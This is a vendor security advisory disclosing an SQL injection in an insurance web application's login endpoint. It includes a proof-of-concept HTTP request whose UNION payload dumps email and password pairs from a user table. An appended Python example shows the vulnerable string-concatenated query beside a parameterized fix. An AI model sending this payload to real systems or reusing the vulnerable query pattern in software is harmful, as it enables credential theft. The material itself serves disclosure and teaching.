SQL Injection in Login API Endpoint
Overview
Advisory ID: TRSA-2004-01
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2004-01
Affected product: Web application https://production.gateway.insure
Affected version: N/A
Vendor: Hepstar Financial Services (Pty) Ltd, https://www.hepstar.com
Credits: Trovent Security GmbH, Stefan Pietsch
Detailed Description
Trovent Security GmbH discovered an SQL injection vulnerability in a Hepstar web application. An unauthenticated attacker is able to execute arbitrary SQL commands through the login endpoint and can read data from all tables of the database.
Severity: Critical
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVE ID: N/A
CWE ID: CWE-89
Note: Trovent Security GmbH did not perform a penetration test of the web application.
Proof of Concept
Sample HTTP request used to verify the vulnerability:
POST /authentication/rest/login HTTP/1.1
Host: production.gateway.insure
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Connection: close

username=x'%20UNION%20SELECT%20SUBSTRING(GROUP_CONCAT(email,'|',password),1,1024),11,11,12345,11,11%20FROM%20security_user--%20-&password=y
Solution / Workaround
Application source code has to be modified to fix the vulnerability.
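To illustrate the fix this advisory calls for, the following is an added example (not code from Hepstar or Trovent): a login query that embeds user input into the SQL text next to the same query with bound parameters, run against a constructed SQLite database. Only the table name security_user comes from the advisory; its columns and the two-column query shape are assumptions.

```python
import sqlite3

# Constructed stand-in for the application's database. Only the table name
# security_user comes from the advisory; its columns are an assumption.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE security_user (username TEXT, email TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO security_user VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "hash1"), ("bob", "bob@example.com", "hash2")],
    )
    db.commit()
    return db

def login_vulnerable(db, username, password):
    # CWE-89: user input is pasted into the statement text, so a quote in the
    # username terminates the string literal and the remainder is parsed as SQL.
    sql = ("SELECT email, password FROM security_user "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return db.execute(sql).fetchall()

def login_parameterized(db, username, password):
    # Fix: bind the values as parameters. The driver passes them separately from
    # the statement, so the input is compared as a literal and never parsed.
    sql = ("SELECT email, password FROM security_user "
           "WHERE username = ? AND password = ?")
    return db.execute(sql, (username, password)).fetchall()

# The advisory's UNION payload, rewritten in SQLite syntax and with the column
# count matched to the two-column query above. Used here only to show that the
# parameterized query returns nothing for it.
PAYLOAD = ("x' UNION SELECT group_concat(email || '|' || password), 'z' "
           "FROM security_user-- -")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:   ", login_vulnerable(db, PAYLOAD, "y"))     # one row of all email|password pairs
    print("parameterized:", login_parameterized(db, PAYLOAD, "y"))  # []
    print("legit login:  ", login_parameterized(db, "alice", "hash1"))
```

The same input that dumps the whole table through the concatenated query matches no row once it is bound as a parameter, while a genuine login still succeeds.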
History
2020-04-17: Vulnerability found, vendor contacted
2020-04-20: Vendor replied, asking for details
2020-04-21: Vulnerability details reported to vendor
2020-04-22: Trovent verified remediation of the vulnerability
2020-05-16: Advisory published